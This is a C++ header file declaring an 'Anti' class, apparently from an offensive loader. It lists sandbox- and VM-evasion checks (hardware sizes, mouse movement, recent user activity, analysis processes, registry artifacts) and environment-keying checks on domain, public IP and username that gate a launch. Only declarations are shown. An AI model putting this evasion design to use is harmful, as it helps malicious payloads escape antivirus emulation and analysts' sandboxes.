#pragma once #include "../../commons.h" #define My_CLSID_WbemLocator OBFI(L"{4590f811-1d3a-11d0-891f-00aa004b2e24}") class Anti { static uint32_t TooMuchMemoryForAVEmulator; static uint8_t Minimum_Number_Of_Processor_Cores; static uint64_t Minimum_RAM_Amount; static uint64_t Minimum_System_Volume_Capacity; static DWORD How_Long_To_Wait_For_Mouse_Movement; static const wchar_t *Internet_Connectivity_Verification_URL; static const wchar_t *Internet_Connectivity_Verification_Regex; static size_t Minimum_Recent_Documents_Expected; static size_t Minimum_Last_Visited_Directories_Expected; static size_t Minimum_USB_Devices_Plugged; bool wmiInitialized; bool domainJoinStatus; IWbemServices *pWbemServices; IWbemLocator *pWbemLocator; // // When callback returns TRUE - the further WMI properties enumeration is stopped. Otherwise, // the enumerator will keep searching. // using WMIPropertyCallback = std::function; using WMIObjectCallback = std::function; size_t level; public: Anti() : level(0), domainJoinStatus(false), wmiInitialized(false), pWbemServices(nullptr), pWbemLocator(nullptr) {} ~Anti() { wmiTearDown(); unloadModules(); } /** * Level 0 - No tests. * Level 1 - Basic anti-emulation tests. Should pass on VMs, with no user interaction * Level 2 - More thorough tests, will rule out VMs but run in environment of no user * Level 3 - All tests. Will run only if there is a user activity detected and no VM. **/ bool checkIfSafeToLaunch(size_t level); bool checkIfMachineSeemsLegit(); std::wstring getDomainName(); std::wstring getUserName(); bool checkIfDomainJoined(bool silent = false); bool checkIfJoinedToSpecificDomain(const std::wstring& domainName, bool silent = false); bool verifyInternetConnectivity(); bool verifyInternetConnectivity(const std::wstring& url, const std::wstring regexToMatch = L""); bool validatePublicIP(const std::wstring& expectedIp); bool validateUsername(const std::wstring& expectedUsername); static DWORD delay(DWORD64 delay, bool silent = false); static std::vector collectRunningProcessNames(); private: bool apiSpecificAntiEmulationChecks(); bool initializeWMI(const wchar_t *szNetworkResource); bool queryWMI(IEnumWbemClassObject **pEnumerator, const std::wstring& wmiQuery); bool queryWMIProperty(const std::wstring& wmiQuery, const std::wstring& propertyName, WMIPropertyCallback callback, void* output = nullptr); bool queryWMIObject(const std::wstring& wmiQuery, WMIObjectCallback callback, void* output = nullptr); uint32_t countWMIObjects(const std::wstring& wmiQuery); void wmiTearDown(); void unloadModules(); bool getNumberOfCoresWMI(UINT &cores, bool logical); bool _getNumberOfCoresWMI(UINT& cores, bool logical); bool getSystemDriveSizeWMI(unsigned long long &diskSize); bool verifyMouseMovement(); bool verifyRecentUserActivity(); bool antiVM(); bool findRogueProcesses(); static bool checkHarddriveName(const std::wstring& s); static std::wstring GetHDDVendorId(); static std::vector getCpuidVendorData(); static bool checkDirectoryExists(const std::wstring& path); static bool checkFileExists(const std::wstring& path); static bool checkRegKeyExists(const std::wstring& path); static bool openDevice(const std::wstring& lpDeviceName); static std::pair crackRegistryPath(const std::wstring& registryPath); uint32_t countRegistryValues(const std::wstring& registryPath); uint32_t countRegistryKeys(const std::wstring& registryPath); uint32_t countFiles(const std::wstring& pathWithWildcard, bool includeDirectories = false); };